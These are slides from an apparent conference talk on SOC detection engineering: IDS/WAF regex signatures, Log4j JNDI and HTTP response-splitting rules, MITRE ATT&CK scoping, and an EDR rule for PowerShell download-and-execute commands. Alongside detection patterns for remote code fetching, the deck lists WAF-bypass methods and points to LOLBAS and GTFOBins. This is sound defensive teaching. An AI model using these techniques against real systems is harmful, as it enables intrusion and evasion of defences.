1 of 20

Detection Engineering for SOC

Sunil Kumar BV | Sr Security Engineer | Rakuten

“Everything published, presented, and/or discussed in this conference is based solely on my personal point of view and does not represent my current or past employers.”

2 of 20

Next 40 Mins!

  • SOC detection concept
  • Detection logic in WAF/IDS: workflow, HTTP header (L7 data fields), regular expressions, example
  • Detection logic in EDR: detection focus based on the kill chain and data collection details, different OS binaries, ATT&CK techniques count per data source, example
  • Q&A

3 of 20

SOC Detections Concept

4 of 20

IDS and WAF Workflow example

Stage 1: Parse the HTTP(S) packet from the client (HTTP request and response logs)

Stage 2: Choose a rule set depending on the type of incoming parameters

Packet decode, HTTP fields

Stage 3: Normalize data (packet grouping)

Stage 4: Apply detection logic, regular-expression based (signatures/rules/patterns)

Stage 5: Make the detection decision: an alert/offence is triggered based on true/false/score
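The five stages above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the rule names, the `RULES` table, and the helper functions are hypothetical and do not come from any vendor product.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical rule sets, keyed by the request field they inspect.
RULES = {
    "uri": [("xss-script-tag", re.compile(r"<script", re.IGNORECASE))],
    "cookie": [("crlf-injection", re.compile(r"\r\n"))],
}

def parse_request(raw):
    """Stage 1: split a raw HTTP request into a few L7 fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri,
            "cookie": headers.get("cookie", ""), "body": body}

def select_rules(fields):
    """Stage 2: keep only the rule sets whose field is present."""
    return {name: RULES[name] for name in RULES if fields.get(name)}

def normalize(value):
    """Stage 3: undo URL encoding so rules see canonical text."""
    return unquote_plus(value)

def detect(raw):
    """Stages 4 and 5: apply the patterns and return matched rule names."""
    fields = parse_request(raw)
    hits = []
    for name, rules in select_rules(fields).items():
        text = normalize(fields[name])
        hits += [rule_id for rule_id, pattern in rules if pattern.search(text)]
    return hits

request = ("GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\n"
           "Host: example.test\r\n\r\n")
alerts = detect(request)
```

Here the decision is a plain true/false per rule; a scoring engine would sum weights per hit instead of returning names.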

5 of 20

HTTP Header (under L7 data)

Layer 7 (or the application layer) is the highest layer in the OSI model of network communication. It's responsible for providing network services to application processes running on a host like web browsers, email clients and file-sharing programs.

Most user-facing protocols and applications like HTTP, FTP and SMTP operate on layer 7.

The list is not limited to these fields; IDS/WAF products expose many more, and different vendors use different approaches (scoring, etc.).

| HTTP Related Fields | Files related | Email Related | TCP/UDP DOS related |
|---|---|---|---|
| http-req-cookie | file-data | pop3-req-protocol-payload | tcp-context-free |
| http-req-headers | file-elf-body | pop3-rsp-protocol-payload | udp-context-free |
| http-req-message-body | file-flv-body | imap-req-cmd-line | |
| http-req-host-ipv4-address-found | file-html-body | imap-req-first-param | unknown-req-tcp-payload |
| http-req-host-ipv6-address-found | file-java-body | imap-req-params-after-first-param | unknown-rsp-tcp-payload |
| http-req-host-header | file-mov-body | imap-req-protocol-payload | |
| http-req-mime-form-data | file-office-content | imap-rsp-protocol-payload | unknown-req-udp-payload |
| http-req-ms-subdomain | file-pdf-body | email-headers | unknown-rsp-udp-payload |
| http-req-origin-headers | file-riff-body | | |
| http-req-params | file-swf-body | | |
| http-req-uri | file-tiff-body | | |
| http-req-uri-path | file-unknown-body | | |
| http-req-user-agent-header | ftp-req-params | | |
| http-rsp-headers | ftp-req-protocol-payload | | |
| http-rsp-non-2xx-r | ftp-rsp-protocol-payload | | |
| http-rsp-reason | ftp-rsp-banner | | |
| http-req-method | ftp-rsp-message | | |

6 of 20

Regular expression…

…is a sequence of characters that defines a search pattern.

  • IDS and WAF use regex for detection logic (it is how the signatures/rules/patterns are written).
  • Easily understandable: human-friendly to read.
  • Simply a string built from different syntax and wildcards, which helps in finding a sub-string in source text.

  • Case-insensitive
  • Search for an open bracket followed by "script"
  • Anything after the string
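The three annotations above (case-insensitive, open bracket plus "script", anything after) can be read against a concrete pattern. The pattern below is an assumed reconstruction for illustration, not necessarily the one shown on the original slide.

```python
import re

# (?i)     -> case-insensitive
# <script  -> an open bracket followed by "script"
# .*       -> anything after the string (up to the end of the line)
SCRIPT_TAG = re.compile(r"(?i)<script.*")

match = SCRIPT_TAG.search("q=<SCRIPT>alert(1)</SCRIPT>")
matched_text = match.group(0) if match else None
```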

Most regex in IDS/WAF is written for signature sets covering injections such as SQLi, LDAP, header, code, OS command, and XSS (cross-site scripting), Nuclei scans, etc.

Attackers can find ways to bypass IDS/WAF; these are bugs or "weak places" in regular expressions:

https://github.com/attackercan/regexp-security-cheatsheet and https://www.slideshare.net/slideshow/lie-tomephd2013/21958607#35

  • ReDoS (regular expression denial of service): rule set bypassing
  • HTTP Parameter Pollution
  • Double URL encoding
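Two of the bypasses above can be countered during normalization, before any pattern runs. The sketch below uses only the Python standard library; the helper names `fully_decode` and `all_values` and the sample inputs are hypothetical.

```python
from urllib.parse import parse_qsl, unquote

def fully_decode(value, max_rounds=5):
    """Decode repeatedly until the value stops changing (double URL encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def all_values(query, name):
    """Return every value of a repeated parameter (HTTP Parameter Pollution)."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]

# "%25" decodes to "%", so one decoding round still leaves "%3Cscript%3E".
decoded = fully_decode("%253Cscript%253E")

# A rule that inspects only the first "id" value would miss the second one.
polluted = all_values("id=1&id=2%20OR%201=1", "id")
```

The `max_rounds` cap is a design choice: it bounds the work an attacker can force with deeply nested encoding.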

Mitigation: Precompile regex patterns where possible to improve performance.

Use a DAT (dynamic analysis tool) for regex checking, and fuzz the regex patterns you create; this helps verify input validation, input limits, regex timeouts, and resource limits.

Ex: https://redosdetector.com/
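A minimal sketch of the precompilation and input-limit ideas, assuming Python. The signature names and the `MAX_INPUT_LENGTH` value are illustrative assumptions. Python's standard `re` module has no timeout parameter, so the length cap stands in for a regex timeout here.

```python
import re

MAX_INPUT_LENGTH = 2048  # assumed limit; tune per field and environment

# Patterns are compiled once at load time, not on every request.
SIGNATURES = {
    "sqli-union-select": re.compile(r"union\s+select", re.IGNORECASE),
    "xss-script-tag": re.compile(r"<script", re.IGNORECASE),
}

def scan(text):
    """Return the names of matching signatures, refusing oversized input."""
    if len(text) > MAX_INPUT_LENGTH:
        return ["input-too-long"]
    return [name for name, pattern in SIGNATURES.items() if pattern.search(text)]
```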

7 of 20

How can these be used in our environment?

- Understanding what to detect

  • Select an adversarial technique to detect (planning)
  • Proof of concept
  • Research the underlying technology (hypothesis creation)

- Understanding how to detect

  • Identify data sources (data and log selection)
  • Build the detection (implementation)
  • Correlate with other log sources

- Peer review (continuous testing and validation)

- Submit the detection into the pipeline (towards production)

8 of 20

Example of writing these patterns/signatures for detection:

Details of a recent attack class: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/

Confusion Attacks:

  • Filename Confusion
  • DocumentRoot Confusion
  • Handler Confusion

Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

CVE-2023-38709 - Apache HTTP Server: HTTP response splitting

https://bugzilla.redhat.com/show_bug.cgi?id=2273491

  • Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.
  • Acknowledgements: finder: Orange Tsai (@orange_8361) from DEVCORE
  • CR + LF (carriage return + line feed, \r\n): used as the newline sequence on Windows and as the line terminator in HTTP headers.

http-req-cookie contains "\r\nContent-Length:" <case-insensitive>

AND

http-req-URL contains "cURL" <case-insensitive>
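The rule above can be expressed as a small predicate over already-parsed fields. This is a sketch: the dictionary keys mirror the field names in the rule, and the function names are hypothetical.

```python
def contains_ci(haystack, needle):
    """Case-insensitive substring test, like the <case-insensitive> flag."""
    return needle.lower() in haystack.lower()

def matches_response_splitting_rule(fields):
    """True when both conditions of the rule hold for one request."""
    cookie = fields.get("http-req-cookie", "")
    url = fields.get("http-req-URL", "")
    return (contains_ci(cookie, "\r\nContent-Length:")
            and contains_ci(url, "cURL"))

suspicious = {
    "http-req-cookie": "session=abc\r\ncontent-length: 0",
    "http-req-URL": "/fetch?tool=curl",
}
benign = {"http-req-cookie": "session=abc", "http-req-URL": "/index.html"}
```

The cookie value is assumed to be decoded already; if the CR/LF arrives as %0d%0a, the normalization stage has to run first.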

9 of 20

Log4J: CVE-2021-44228

It is an RCE vulnerability in Apache Log4j 2.0-beta9 through 2.14.1.

An attacker exploits it by submitting an exploit string as part of the HTTP headers destined for a vulnerable server; when the string is logged, the server requests a malicious payload from an attacker-controlled server through the Java Naming and Directory Interface (JNDI) over a variety of services, such as Lightweight Directory Access Protocol (LDAP).

POC: https://www.trendmicro.com/ja_jp/devops/22/a/detect-log4j-vulnerabilities.html

For threat classification, see:

http://projects.webappsec.org/w/page/13246978/Threat%20Classification

http-req-headers contains "${jndi:" <case-insensitive>

OR

http-req-headers contains "${jndi:ldap" <case-insensitive>

OR

http-req-headers contains "${jndi:ldap" AND matches "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b"
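The three conditions above can be sketched as Python regular expressions. The labels returned by `classify_header` are hypothetical names, ordered from most to least specific.

```python
import re

JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)
JNDI_LDAP = re.compile(r"\$\{jndi:ldaps?://", re.IGNORECASE)
DOMAIN = re.compile(r"\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")

def classify_header(value):
    """Return the most specific matching label, or None when nothing matches."""
    if JNDI_LDAP.search(value) and DOMAIN.search(value):
        return "jndi-ldap-with-domain"
    if JNDI_LDAP.search(value):
        return "jndi-ldap"
    if JNDI_LOOKUP.search(value):
        return "jndi-lookup"
    return None

label = classify_header("${jndi:ldap://attacker.example/a}")
```

Plain patterns like these will miss obfuscated forms such as nested lookups (for example `${${lower:j}ndi:...}`), so they are a starting point rather than complete coverage.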

10 of 20

Detection Logic in EDR

- IOCs change easily.

- We should concentrate on Tactics, Techniques and Procedures (TTPs):

how the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

What exactly to look at:

  • In the example, the technique used is credential dumping and only one of its procedures is shown. Is that enough, or do we need to do atomic testing?
  • What happens when the adversary uses a new procedure: will our alarms still work?

11 of 20

Detection Focus (based on Kill chain)

Reconnaissance: attackers scan the environment. At most we can block an IP or segment, but they can change it quickly before the attack.

Weaponization: we cannot catch the attackers here, as they build their payload in their own environment, where we have no access or logs.

Delivery/Exploitation: these are addressed by our vendor products, such as firewalls and email gateways.

Installation and C2: this is where detection engineering can focus. Once files (macro, PowerShell, etc.) from any process or object get in, we can check for possible alerting in the environment.

Action on Objectives: fine-tune the detections/rule set based on organizational requirements to reduce FP fatigue.

Impact: the goal is to catch the adversary before potential impact.

Data collections:

- Type of Data collected?

- Where is it stored?

- Is it ingested to SIEM, EDR or not?

- Prioritizing data sources based on expenses.

- Gap analysis on Data sources and ingested data.
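The gap analysis in the last item is essentially a set difference between what the detections need and what is actually ingested. A minimal sketch, with both sets filled with assumed example values:

```python
# Data sources the planned detections depend on (assumed example values).
required = {"Process Creation", "Command Execution", "Network Connection Creation"}

# Data sources currently ingested into the SIEM/EDR (assumed example values).
ingested = {"Process Creation", "File Creation"}

# Needed but not collected: candidates for onboarding.
gaps = sorted(required - ingested)

# Collected but not used by any detection: candidates for cost review.
unused = sorted(ingested - required)
```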

12 of 20

MITRE Framework

  • MITRE ATT&CK can be overwhelming. Navigator: https://mitre-attack.github.io/attack-navigator/
  • We need to scope the attack vectors, basically filtering based on requirements:

- Filter the platform in layer controls (Linux, Windows, macOS, etc.)

- Then look for particular items under selection controls: threat group, data sources

- Select unannotated (technique/task not applicable)

- Then toggle the state and hide (eyeball icon) the rest.

13 of 20

Adversaries Leverage Scripts

OS binaries are local to their OS, but these binaries have been utilized and exploited by cyber criminals and crime groups to camouflage their malicious activity.

We can look at the categories for various OS binaries:

  1. Windows OS built-in binaries: Living Off The Land Binaries and Scripts (LOLBAS), https://lolbas-project.github.io/api/lolbas.csv
     • This file contains every LOLBAS entry in a single file, broken down by LOLBAS file and command.
     • LOLBAS are often Microsoft-signed binaries.
     • They can be used for a range of attacks, from executing code to performing file operations (downloading, uploading, copying, etc.).
  2. macOS built-in binaries: Living Off the Orchard (LOOBins), https://www.loobins.io/binaries/. PyLOOBins is a Python SDK and command-line utility for programmatically interacting with LOOBins: https://www.loobins.io/docs/api/pyloobins/
  3. Unix OS built-in binaries: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. https://gtfobins.github.io/ https://github.com/GTFOBins
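One simple way to use these lists is to flag process events whose image name appears on a watchlist. The sketch below hardcodes a small illustrative subset of Windows binaries instead of loading the LOLBAS CSV, and `is_watchlisted` is a hypothetical helper name.

```python
import ntpath

# Illustrative subset only; a real watchlist would be built from the full list.
WATCHLIST = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

def is_watchlisted(image_path):
    """Compare the file name part of a Windows path against the watchlist."""
    return ntpath.basename(image_path).lower() in WATCHLIST

flagged = is_watchlisted(r"C:\Windows\System32\CertUtil.exe")
```

A name match alone is noisy because these binaries are also used legitimately, so it would normally be combined with command-line or parent-process conditions.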

14 of 20

ATT&CK techniques count per Data Source

We can see that Command Execution and Process Creation are the data sources that cover the most techniques.

DeTT&CT: the DeTT&CT (Detect Tactics, Techniques & Combat Threats) framework, built on MITRE ATT&CK

Based on this, we can prioritize our data collection to address ATT&CK techniques and sub-techniques, and collect Sysmon, Linux, server, and other logs accordingly.

15 of 20

EDR Fields

These are some of the most used data fields associated with events. Fields that begin with lowercase letters are present in all events. The agents that collect the data provide many more fields.

  • timestamp, _time, HostID, event_platform, event_Name
  • ComputerName
  • OriginalFilename, FileName
  • ImageFileName, GrandParentFileName, BaseFileName, TargetFileName
  • ContextBaseFileName
  • SHA256HashData, DomainName, HostURL
  • FilePath, GrandParentImageFilePath, ParentImageFilePath, FileWrittenFlags
  • DetectId, DetectName, DetectDescription
  • CommandLine, ParentCommandLine, GrandparentCommandLine
  • RegType, RegistryPath, RegNumericValue, RegStringValue, RegBinaryValue

16 of 20

Example: Detecting malicious PowerShell command execution

PowerShell is a built-in command-line tool. It can download and execute code from another system and provides unprecedented access on Windows computers.

Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.

Several offensive tools are built on or use PowerShell, including Invoke-Mimikatz.

POC: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters

- Further tuning may be needed based on which process executed the command (the parent process) and whether that parent is legitimate or unknown, etc.

Condition 1:

((CommandLine contains "powershell.exe -exec" AND CommandLine contains "bypass")

AND

(CommandLine contains "IEX (" OR CommandLine contains "Invoke-Expression")

AND

CommandLine contains ".DownloadString"

AND

CommandLine matches "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b"

AND

referrerURL matches "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")
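Condition 1 can be sketched as a predicate over a single event. The event is assumed to be a dictionary with `CommandLine` and `referrerURL` keys, and the sample events are made up for illustration.

```python
import re

DOMAIN = re.compile(r"\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")

def matches_condition_1(event):
    """Evaluate every AND/OR clause of Condition 1, case-insensitively."""
    command_line = event.get("CommandLine", "")
    referrer = event.get("referrerURL", "")
    cl = command_line.lower()
    return (
        "powershell.exe -exec" in cl
        and "bypass" in cl
        and ("iex (" in cl or "invoke-expression" in cl)
        and ".downloadstring" in cl
        and DOMAIN.search(command_line) is not None
        and DOMAIN.search(referrer) is not None
    )

malicious = {
    "CommandLine": "powershell.exe -exec bypass -c \"IEX (New-Object "
                   "Net.WebClient).DownloadString('http://evil.example/a.ps1')\"",
    "referrerURL": "http://evil.example/",
}
benign = {"CommandLine": "powershell.exe -File backup.ps1", "referrerURL": ""}
```

One tuning point this exposes: the domain pattern also matches "powershell.exe" itself, so the CommandLine domain clause adds nothing once the first clause has matched. A stricter pattern, for example one anchored on "http://" or "https://", may be worth testing.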

17 of 20

Processing Directions:

Step 1: Collect commands/scripts and their variable details:

Step 2:

In the same way, we can try other commands and processes, such as:

  • nltest ***
  • net config ***
  • Run cmd ***

18 of 20

Fine tuning Practices

- Continuous improvement and development: use version control to keep and monitor changes.

- Inefficient alerts need to be fixed: update the logic, or add new functionality such as enrichment or correlation.

- Review alerts periodically:

  • Number of alerts/offences
  • Number of FP, benign TP, TP
  • Event-to-alert time differences
  • Syslog or EDR agent fields
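The review metrics above can be computed from exported alert records. The record layout (`verdict`, `event_time`, `alert_time`) and the sample values below are assumptions for illustration, not a specific SIEM export format.

```python
from collections import Counter
from datetime import datetime

# Hypothetical alert records exported for one rule.
alerts = [
    {"verdict": "TP", "event_time": "2024-01-01T10:00:00", "alert_time": "2024-01-01T10:02:00"},
    {"verdict": "FP", "event_time": "2024-01-01T10:05:00", "alert_time": "2024-01-01T10:06:00"},
    {"verdict": "FP", "event_time": "2024-01-01T11:00:00", "alert_time": "2024-01-01T11:04:00"},
    {"verdict": "Benign TP", "event_time": "2024-01-01T12:00:00", "alert_time": "2024-01-01T12:01:00"},
]

def review(records):
    """Summarize alert volume, verdict mix and event-to-alert delay.

    Assumes a non-empty list of records.
    """
    verdicts = Counter(r["verdict"] for r in records)
    delays = [
        (datetime.fromisoformat(r["alert_time"])
         - datetime.fromisoformat(r["event_time"])).total_seconds()
        for r in records
    ]
    return {
        "total": len(records),
        "verdicts": dict(verdicts),
        "fp_ratio": verdicts["FP"] / len(records),
        "mean_delay_seconds": sum(delays) / len(delays),
    }

summary = review(alerts)
```

Tracking these numbers per rule over time shows which detections need tuning first.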

20 of 20

Any questions?